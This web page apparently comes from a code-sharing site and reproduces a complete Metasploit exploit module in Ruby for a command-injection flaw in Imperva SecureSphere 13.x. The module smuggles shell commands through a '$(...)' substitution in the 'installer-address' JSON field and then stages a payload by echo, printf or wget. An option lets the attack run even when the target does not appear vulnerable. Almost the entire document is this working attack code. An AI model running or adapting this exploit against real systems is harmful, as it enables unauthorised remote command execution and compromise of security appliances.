扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 |
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super( update_info( info, 'Name' => 'Imperva SecureSphere PWS Command Injection', 'Description'=> %q( This module exploits a command injection vulnerability in Imperva SecureSphere 13.x. The vulnerability exists in the PWS service, where Python CGIs didn't properly sanitize user supplied command parameters and directly passes them to corresponding CLI utility, leading to command injection. Agent registration credential is required to exploit SecureSphere in gateway mode. This module was successfully tested on Imperva SecureSphere 13.0/13.1/ 13.2 in pre-ftl mode and unsealed gateway mode. ), 'License'=> MSF_LICENSE, 'Author' => [ 'rsp3ar <lukunming<at>gmail.com>' # Discovery/Metasploit Module ], 'References' => [ [ 'EDB', '45542' ] ], 'DisclosureDate'=> "Oct 8 2018", 'DefaultOptions' => { 'SSL' => true, 'PrependFork' => true, }, 'Platform'=> 'linux', 'Arch'=> [ARCH_X86, ARCH_X64], 'CmdStagerFlavor' => %w{ echo printf wget }, 'Targets' => [ ['Imperva SecureSphere 13.0/13.1/13.2', {}] ], 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(443), OptString.new('USERNAME', [false, 'Agent registration username', 'imperva']), OptString.new('PASSWORD', [false, 'Agent registration password', '']), OptString.new('TARGETURI', [false, 'The URI path to impcli', '/pws/impcli']), OptInt.new('TIMEOUT', [false, 'HTTP connection timeout', 15]) ]) register_advanced_options [ OptBool.new('ForceExploit',[false, 'Override check result', false]) ] end def check begin res = execute_command('id') rescue => e vprint_error("#{e}") return CheckCode::Unknown end if res.body =~ /uid=\d+/ return CheckCode::Vulnerable end CheckCode::Safe end def exploit unless CheckCode::Vulnerable == check unless datastore['ForceExploit'] fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.') end print_warning 'Target does not appear to be vulnerable' end print_status("Sending payload #{datastore['PAYLOAD']}") execute_cmdstager end def execute_command(cmd, opts = {}) data = { 'command' => 'impctl server status', 'parameters'=> { 'broadcast' => true, 'installer-address' => "127.0.0.1 $(#{cmd})" } } res = send_request data return unless res if res.code == 401 fail_with(Failure::NoAccess, 'Authorization Failure, valid agent registration credential is required') end unless res.code == 406 && res.body.include?("impctl") fail_with(Failure::Unknown, 'Server did not respond in an expected way') end res end def send_request(data) req_params = { 'method'=> 'POST', 'uri' => normalize_uri(target_uri.path), 'data'=> data.to_json } if !datastore['USERNAME'].blank? && !datastore['PASSWORD'].blank? unless @cookie res = send_request_cgi({ 'method'=> 'GET', 'uri' => normalize_uri('/') }) unless res fail_with(Failure::Unreachable, "#{peer} - Connection failed") end @cookie = res.get_cookies end req_params['cookie'] = @cookie req_params['headers'] = { 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) } end send_request_cgi(req_params, datastore['TIMEOUT']) end end |
体验盒子
